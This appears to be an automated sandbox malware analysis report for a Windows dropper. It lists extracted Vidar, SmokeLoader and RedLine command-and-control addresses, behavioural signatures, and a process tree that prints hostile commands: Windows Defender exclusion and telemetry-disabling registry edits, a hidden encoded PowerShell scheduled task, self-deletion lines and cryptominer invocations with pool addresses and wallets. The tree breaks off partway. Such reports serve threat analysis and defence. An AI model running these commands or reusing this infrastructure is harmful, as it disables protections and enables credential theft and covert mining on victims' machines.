Analysis

  • max time kernel
    126s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    10-03-2022 18:26

General

  • Target

    51cbad3e47182748e55c0e8a0edb0226e8191a39abd557fee914b4ffc85e33e6.exe

  • Size

    3.3MB

  • MD5

    31f7182e5cd70ce483f1d0796688a9d6

  • SHA1

    21f59deec90351ae24ff9c99fcfff70d66269de5

  • SHA256

    51cbad3e47182748e55c0e8a0edb0226e8191a39abd557fee914b4ffc85e33e6

  • SHA512

    ef1b6dffab23371ce73fecfb31ee3db53fe36eb2e7729a81e262e968b35a4e7373a8dbc05a8e95e5a06aeda925f48f5a9e3e0e44737461d6a053355e109584b5

Malware Config

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

dadad123

C2

86.107.197.196:63065

Attributes
  • auth_value

    dd4834614a3ac04a7b90791c224626a2

Extracted

Family

vidar

Version

50.7

Botnet

937

C2

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Extracted

Family

redline

C2

45.85.190.85:13040

Attributes
  • auth_value

    c7db538c183a8cd65bf772422d98fa2f

Extracted

Family

redline

Botnet

Lyla2

C2

bonezarisor.xyz:80

Attributes
  • auth_value

    de2a98abc502b86b809fbc366af9256a

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 18 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • Looks for VirtualBox Guest Additions in registry 2 TTPs
  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 37 IoCs
  • Looks for VMWare Tools registry key 2 TTPs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 18 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\51cbad3e47182748e55c0e8a0edb0226e8191a39abd557fee914b4ffc85e33e6.exe
    "C:\Users\Admin\AppData\Local\Temp\51cbad3e47182748e55c0e8a0edb0226e8191a39abd557fee914b4ffc85e33e6.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1820
    • C:\Users\Admin\AppData\Local\Temp\7zSC175B49D\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zSC175B49D\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sotema_7.exe
        3⤵
          PID:3796
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sotema_6.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4128
          • C:\Users\Admin\AppData\Local\Temp\7zSC175B49D\sotema_6.exe
            sotema_6.exe
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2408
            • C:\Users\Admin\AppData\Local\Temp\is-2AGS6.tmp\sotema_6.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-2AGS6.tmp\sotema_6.tmp" /SL5="$9004A,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zSC175B49D\sotema_6.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sotema_5.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3484
          • C:\Users\Admin\AppData\Local\Temp\7zSC175B49D\sotema_5.exe
            sotema_5.exe
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4772
            • C:\Users\Admin\Documents\ojWUNcZrZwX3m2qqDNDtVLbd.exe
              "C:\Users\Admin\Documents\ojWUNcZrZwX3m2qqDNDtVLbd.exe"
              5⤵
              • Executes dropped EXE
              • Checks computer location settings
              PID:4452
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 628
                6⤵
                • Program crash
                PID:4836
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 636
                6⤵
                • Program crash
                PID:1412
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 260
                6⤵
                • Program crash
                PID:2956
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 668
                6⤵
                • Program crash
                PID:2248
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1268
                6⤵
                • Program crash
                PID:4284
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1276
                6⤵
                • Program crash
                PID:224
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1304
                6⤵
                • Program crash
                PID:2984
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im "ojWUNcZrZwX3m2qqDNDtVLbd.exe" /f & erase "C:\Users\Admin\Documents\ojWUNcZrZwX3m2qqDNDtVLbd.exe" & exit
                6⤵
                  PID:3720
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im "ojWUNcZrZwX3m2qqDNDtVLbd.exe" /f
                    7⤵
                    • Kills process with taskkill
                    PID:4284
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1436
                  6⤵
                  • Program crash
                  PID:2504
              • C:\Users\Admin\Documents\n3OiEMwuGuGQQdL7GQrnTV0q.exe
                "C:\Users\Admin\Documents\n3OiEMwuGuGQQdL7GQrnTV0q.exe"
                5⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3128
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im n3OiEMwuGuGQQdL7GQrnTV0q.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\n3OiEMwuGuGQQdL7GQrnTV0q.exe" & del C:\ProgramData\*.dll & exit
                  6⤵
                    PID:3164
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im n3OiEMwuGuGQQdL7GQrnTV0q.exe /f
                      7⤵
                      • Kills process with taskkill
                      PID:1476
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      7⤵
                      • Delays execution with timeout.exe
                      PID:5072
                • C:\Users\Admin\Documents\Rg3gAdxGloHulpbiaEnvLE6Y.exe
                  "C:\Users\Admin\Documents\Rg3gAdxGloHulpbiaEnvLE6Y.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:4160
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\Rg3gAdxGloHulpbiaEnvLE6Y.exe
                    6⤵
                      PID:1456
                      • C:\Windows\system32\choice.exe
                        choice /C Y /N /D Y /T 0
                        7⤵
                          PID:4984
                    • C:\Users\Admin\Documents\dBzrDOaWBl_qpyrAqOMChZa3.exe
                      "C:\Users\Admin\Documents\dBzrDOaWBl_qpyrAqOMChZa3.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:1368
                      • C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe
                        "C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"
                        6⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of SetThreadContext
                        PID:2036
                        • C:\Windows\bfsvc.exe
                          C:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF
                          7⤵
                            PID:1824
                          • C:\Windows\notepad.exe
                            C:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov
                            7⤵
                              PID:2060
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -u -p 2060 -s 416
                                8⤵
                                • Program crash
                                PID:1084
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -u -p 2060 -s 424
                                8⤵
                                • Program crash
                                PID:2988
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"
                              7⤵
                                PID:860
                                • C:\Windows\system32\WerFault.exe
                                  C:\Windows\system32\WerFault.exe -u -p 860 -s 232
                                  8⤵
                                  • Program crash
                                  PID:1184
                            • C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\jOW1D87fZN3R3jFe02zd.exe
                              "C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\jOW1D87fZN3R3jFe02zd.exe"
                              6⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of SetThreadContext
                              PID:2976
                              • C:\Windows\bfsvc.exe
                                C:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF
                                7⤵
                                  PID:3176
                                • C:\Windows\notepad.exe
                                  C:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov
                                  7⤵
                                    PID:5012
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 5012 -s 416
                                      8⤵
                                      • Program crash
                                      PID:1816
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 5012 -s 424
                                      8⤵
                                      • Program crash
                                      PID:1896
                                  • C:\Windows\explorer.exe
                                    C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"
                                    7⤵
                                      PID:64
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 64 -s 232
                                        8⤵
                                        • Program crash
                                        PID:4916
                                • C:\Users\Admin\Documents\mY7_Lpj0MNJdwytiDlPUiJXZ.exe
                                  "C:\Users\Admin\Documents\mY7_Lpj0MNJdwytiDlPUiJXZ.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  PID:4532
                                  • C:\Users\Admin\AppData\Local\Temp\7zS502C.tmp\Install.exe
                                    .\Install.exe
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4580
                                    • C:\Users\Admin\AppData\Local\Temp\7zS62C9.tmp\Install.exe
                                      .\Install.exe /S /site_id "525403"
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks computer location settings
                                      • Drops file in System32 directory
                                      • Enumerates system info in registry
                                      PID:3756
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                        8⤵
                                          PID:636
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                            9⤵
                                            • Blocklisted process makes network request
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:116
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                              10⤵
                                                PID:3700
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                10⤵
                                                  PID:4472
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                              8⤵
                                                PID:2184
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                  9⤵
                                                    PID:3572
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                      10⤵
                                                        PID:4876
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                        10⤵
                                                          PID:4680
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "gqJTosJtx" /SC once /ST 04:05:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                      8⤵
                                                      • Creates scheduled task(s)
                                                      PID:1348
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /run /I /tn "gqJTosJtx"
                                                      8⤵
                                                        PID:1964
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /DELETE /F /TN "gqJTosJtx"
                                                        8⤵
                                                          PID:4948
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 09:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\PxGCxFk.exe\" j6 /site_id 525403 /S" /V1 /F
                                                          8⤵
                                                          • Drops file in Windows directory
                                                          • Creates scheduled task(s)
                                                          PID:1752
                                                  • C:\Users\Admin\Documents\YSRViDO5WXAaVBNNeDkhSgAE.exe
                                                    "C:\Users\Admin\Documents\YSRViDO5WXAaVBNNeDkhSgAE.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Checks BIOS information in registry
                                                    • Maps connected drives based on registry
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5076
                                                    • C:\Users\Admin\Documents\YSRViDO5WXAaVBNNeDkhSgAE.exe
                                                      "C:\Users\Admin\Documents\YSRViDO5WXAaVBNNeDkhSgAE.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:3172
                                                  • C:\Users\Admin\Documents\4hYgpt9_acM_3hmAI2bfjplm.exe
                                                    "C:\Users\Admin\Documents\4hYgpt9_acM_3hmAI2bfjplm.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2200
                                                  • C:\Users\Admin\Documents\PsO2dQRord_vWR5VIB7C6hda.exe
                                                    "C:\Users\Admin\Documents\PsO2dQRord_vWR5VIB7C6hda.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Checks computer location settings
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4288
                                                    • C:\Users\Admin\AppData\Local\Temp\17228fd9-a388-455d-ae92-1b621ac42368.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\17228fd9-a388-455d-ae92-1b621ac42368.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks processor information in registry
                                                      PID:4956
                                                  • C:\Users\Admin\Documents\WPxp8Q4w9r2xbyQeVuBX8tYx.exe
                                                    "C:\Users\Admin\Documents\WPxp8Q4w9r2xbyQeVuBX8tYx.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:1264
                                                  • C:\Users\Admin\Documents\Lj61_kq33Wo0vp0iWNWVHBvH.exe
                                                    "C:\Users\Admin\Documents\Lj61_kq33Wo0vp0iWNWVHBvH.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:4344
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 432
                                                      6⤵
                                                      • Program crash
                                                      PID:4984
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 440
                                                      6⤵
                                                      • Program crash
                                                      PID:5112
                                                  • C:\Users\Admin\Documents\xkpmhnuUMx_9hSBpPSiI6Wzc.exe
                                                    "C:\Users\Admin\Documents\xkpmhnuUMx_9hSBpPSiI6Wzc.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:1924
                                                  • C:\Users\Admin\Documents\M0neEv3auHjE_Tl5Vw4Stnh9.exe
                                                    "C:\Users\Admin\Documents\M0neEv3auHjE_Tl5Vw4Stnh9.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Checks computer location settings
                                                    PID:5060
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                      6⤵
                                                        PID:216
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd
                                                          7⤵
                                                            PID:908
                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                              tasklist /FI "imagename eq BullGuardCore.exe"
                                                              8⤵
                                                              • Enumerates processes with tasklist
                                                              PID:3096
                                                            • C:\Windows\SysWOW64\find.exe
                                                              find /I /N "bullguardcore.exe"
                                                              8⤵
                                                                PID:3664
                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                tasklist /FI "imagename eq PSUAService.exe"
                                                                8⤵
                                                                • Enumerates processes with tasklist
                                                                PID:3080
                                                              • C:\Windows\SysWOW64\find.exe
                                                                find /I /N "psuaservice.exe"
                                                                8⤵
                                                                  PID:1088
                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                  findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                  8⤵
                                                                    PID:3544
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                    Accostarmi.exe.pif N
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SendNotifyMessage
                                                                    PID:2184
                                                            • C:\Users\Admin\Documents\94uMlz8q0QiCEsJMPINanDKI.exe
                                                              "C:\Users\Admin\Documents\94uMlz8q0QiCEsJMPINanDKI.exe"
                                                              5⤵
                                                                PID:116
                                                                • C:\Users\Admin\AppData\Local\Temp\D7D7F.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\D7D7F.exe"
                                                                  6⤵
                                                                    PID:4268
                                                                  • C:\Users\Admin\AppData\Local\Temp\B38FC.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\B38FC.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:1880
                                                                  • C:\Users\Admin\AppData\Local\Temp\LKCMG.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\LKCMG.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:3452
                                                                  • C:\Users\Admin\AppData\Local\Temp\9J6E7.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\9J6E7.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:2404
                                                                  • C:\Users\Admin\AppData\Local\Temp\7F164117A395MIB.exe
                                                                    https://iplogger.org/1nChi7
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Modifies Internet Explorer settings
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:2956
                                                                  • C:\Users\Admin\AppData\Local\Temp\JH77D.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\JH77D.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Checks computer location settings
                                                                    PID:3024
                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                      "C:\Windows\System32\regsvr32.exe" -S .\b0EiM8L.W -U
                                                                      7⤵
                                                                      • Loads dropped DLL
                                                                      PID:3136
                                                                • C:\Users\Admin\Documents\FOiIsW5T7wHwyd3xmazGji3B.exe
                                                                  "C:\Users\Admin\Documents\FOiIsW5T7wHwyd3xmazGji3B.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:2124
                                                                  • C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe"
                                                                    6⤵
                                                                      PID:1612
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      6⤵
                                                                        PID:3164
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c sotema_4.exe
                                                                  3⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1392
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC175B49D\sotema_4.exe
                                                                    sotema_4.exe
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:2392
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:2292
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:3756
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c sotema_3.exe
                                                                  3⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1228
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC175B49D\sotema_3.exe
                                                                    sotema_3.exe
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Modifies system certificate store
                                                                    PID:2504
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1584
                                                                      5⤵
                                                                      • Program crash
                                                                      PID:4408
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c sotema_2.exe
                                                                  3⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1556
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC175B49D\sotema_2.exe
                                                                    sotema_2.exe
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Checks SCSI registry key(s)
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:3384
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c sotema_1.exe
